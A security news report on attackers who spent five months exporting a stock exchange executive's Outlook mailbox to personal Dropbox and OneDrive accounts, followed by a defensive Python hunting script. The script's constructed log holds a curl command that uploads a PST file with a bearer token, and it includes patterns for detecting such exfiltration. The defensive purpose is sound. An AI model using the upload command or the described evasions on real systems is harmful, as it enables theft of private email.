Attackers Monitored Exchange Executive’s Outlook for Five Months

Unknown attackers accessed a senior executive’s Outlook mailbox at a major global stock exchange for at least five months, exporting PST files via Dropbox and OneDrive.

Unknown attackers had at least five months of access to a senior executive’s Outlook mailbox at a major global stock exchange, repeatedly exporting PST files and uploading them to personal Dropbox and OneDrive accounts, Symantec and Carbon Black’s Threat Hunter Team reported. The executive and the exchange were not named.

Security logs first showed malicious activity on October 10, 2025. By that date two binaries were running with SYSTEM privileges on the executive’s machine, one posing as Adobe’s updater and the other as OneDrive. Symantec assessed the initial foothold likely came from lateral movement off a previously compromised device; how the attacker first gained entry remains unknown.

On November 12 the intruder harvested a Dropbox API token and began uploading files using curl. The campaign used a mailbox stealer built on Aspose, a .NET library that reads Outlook OST and PST files. Packaged as an executable, the tool converted the mailbox to PST files, using a password and a date-range flag. The first extraction retrieved messages dating back to August 2025.

The attacker returned every two to four weeks, performing eight additional partial exports through February 17, 2026. Each export covered only the days since the previous run, producing a near-continuous copy while keeping each transfer small. For exfiltration the attacker used personal Dropbox and OneDrive accounts; OneDrive traffic went to hard-coded Microsoft IP addresses rather than the onedrive.live.com hostname to avoid generating DNS lookups. The attacker tested the public host temp.sh once in November and did not continue using it.

Symantec's published indicators show other tools in the intruder's toolkit, including FRPC for tunneling traffic, Secretsdump for extracting Windows credentials, SharpDecryptPwd for recovering saved application passwords, and a utility to bypass Windows User Account Control. The report does not link the artifacts to a known threat actor.

The last observed activity, on March 19, 2026, was a staged backdoor that was prepared but not executed. Symantec reported no evidence that a software vulnerability with a Common Vulnerabilities and Exposures entry was involved in this incident. Symantec recommended monitoring for unusual mailbox exports, unexpected Outlook access, uploads to personal cloud accounts, tunneling activity and credential dumping on systems used by privileged users.
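The monitoring the report recommends, applied to the evasions described above (small partial exports every few weeks, cloud traffic sent straight to hard-coded IP addresses with no DNS lookup, curl uploads carrying a harvested token), as an added Python example that is not code from the Symantec report. It runs over constructed, Sysmon-style JSON-lines endpoint events; the file paths, hostnames, the 203.0.113.0/24 range standing in for a cloud provider's address space, and the export-cadence thresholds are all assumptions chosen for illustration.

```python
"""Hunting heuristics for the mailbox-export-and-upload pattern in the report.

All telemetry below is constructed for this example. The IP ranges, paths and
thresholds are assumptions a defender would replace with their own inventory.
"""
import json
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed sample telemetry from one endpoint (not from the incident).
# 203.0.113.0/24 is a documentation range used here in place of a cloud
# provider's real address space; the token value is a placeholder.
SAMPLE_LOG = r"""
{"ts": "2025-11-12T09:01:00", "type": "file", "image": "C:\\Users\\exec\\AppData\\Local\\Temp\\OneDrive.exe", "path": "C:\\Users\\exec\\AppData\\Local\\Temp\\mail_2025-11-12.pst"}
{"ts": "2025-11-12T09:03:00", "type": "proc", "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe -H \"Authorization: Bearer PLACEHOLDER_TOKEN\" --upload-file mail_2025-11-12.pst https://content.dropboxapi.com/2/files/upload"}
{"ts": "2025-12-01T10:00:00", "type": "file", "image": "C:\\Users\\exec\\AppData\\Local\\Temp\\OneDrive.exe", "path": "C:\\Users\\exec\\AppData\\Local\\Temp\\mail_2025-12-01.pst"}
{"ts": "2025-12-01T10:02:00", "type": "net", "image": "C:\\Users\\exec\\AppData\\Local\\Temp\\OneDrive.exe", "dst_ip": "203.0.113.25", "dst_port": 443}
{"ts": "2025-12-01T11:00:00", "type": "dns", "query": "onedrive.live.com", "answers": ["203.0.113.40"]}
{"ts": "2025-12-01T11:00:01", "type": "net", "image": "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe", "dst_ip": "203.0.113.40", "dst_port": 443}
{"ts": "2025-12-15T08:30:00", "type": "file", "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "path": "C:\\Users\\exec\\Documents\\Outlook Files\\archive.pst"}
"""

# Assumption: address ranges of cloud-storage providers you track.
CLOUD_STORAGE_NETS = [ip_network("203.0.113.0/24")]
# Assumption: the "every two to four weeks" cadence, with some slack.
EXPORT_GAP_MIN, EXPORT_GAP_MAX = timedelta(days=7), timedelta(days=45)


def load_events(text):
    """Parse JSON lines into dicts sorted by timestamp."""
    events = [json.loads(line) for line in text.strip().splitlines() if line.strip()]
    for event in events:
        event["ts"] = datetime.fromisoformat(event["ts"])
    return sorted(events, key=lambda e: e["ts"])


def pst_writes_by_non_outlook(events):
    """PST files created by any process other than Outlook itself."""
    return [e for e in events if e["type"] == "file"
            and e["path"].lower().endswith(".pst")
            and not e["image"].lower().endswith("\\outlook.exe")]


def recurring_exports(events):
    """True when the non-Outlook PST writes recur on a weeks-long cadence."""
    times = [e["ts"] for e in pst_writes_by_non_outlook(events)]
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    return bool(gaps) and all(EXPORT_GAP_MIN <= g <= EXPORT_GAP_MAX for g in gaps)


def cloud_connections_without_dns(events):
    """TLS connections into cloud-storage ranges whose IP never came from a DNS answer.

    Legitimate clients resolve a hostname first; a hard-coded IP never does.
    """
    resolved = set()
    hits = []
    for event in events:
        if event["type"] == "dns":
            resolved.update(event["answers"])
        elif event["type"] == "net" and event["dst_port"] == 443:
            ip = ip_address(event["dst_ip"])
            in_cloud = any(ip in net for net in CLOUD_STORAGE_NETS)
            if in_cloud and event["dst_ip"] not in resolved:
                hits.append(event)
    return hits


def curl_uploads_to_personal_cloud(events):
    """curl invocations carrying a bearer token to a Dropbox API endpoint."""
    return [e for e in events if e["type"] == "proc"
            and e["image"].lower().endswith("curl.exe")
            and "authorization: bearer" in e["cmdline"].lower()
            and "dropboxapi.com" in e["cmdline"].lower()]


def hunt(text):
    """Run every heuristic over one endpoint's log and summarise the findings."""
    events = load_events(text)
    return {
        "pst_writes": len(pst_writes_by_non_outlook(events)),
        "recurring": recurring_exports(events),
        "direct_ip_cloud": [e["dst_ip"] for e in cloud_connections_without_dns(events)],
        "curl_uploads": len(curl_uploads_to_personal_cloud(events)),
    }


if __name__ == "__main__":
    print(json.dumps(hunt(SAMPLE_LOG), indent=2))
```

On the constructed sample the PST write by the real Outlook process and the OneDrive connection that followed a DNS answer are left alone, while the two exports by the look-alike OneDrive.exe, the cadence between them, the connection to a cloud address that was never resolved, and the curl upload with a bearer token are each flagged. In production the DNS correlation needs a bounded window and a per-host cache rather than an unbounded set.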
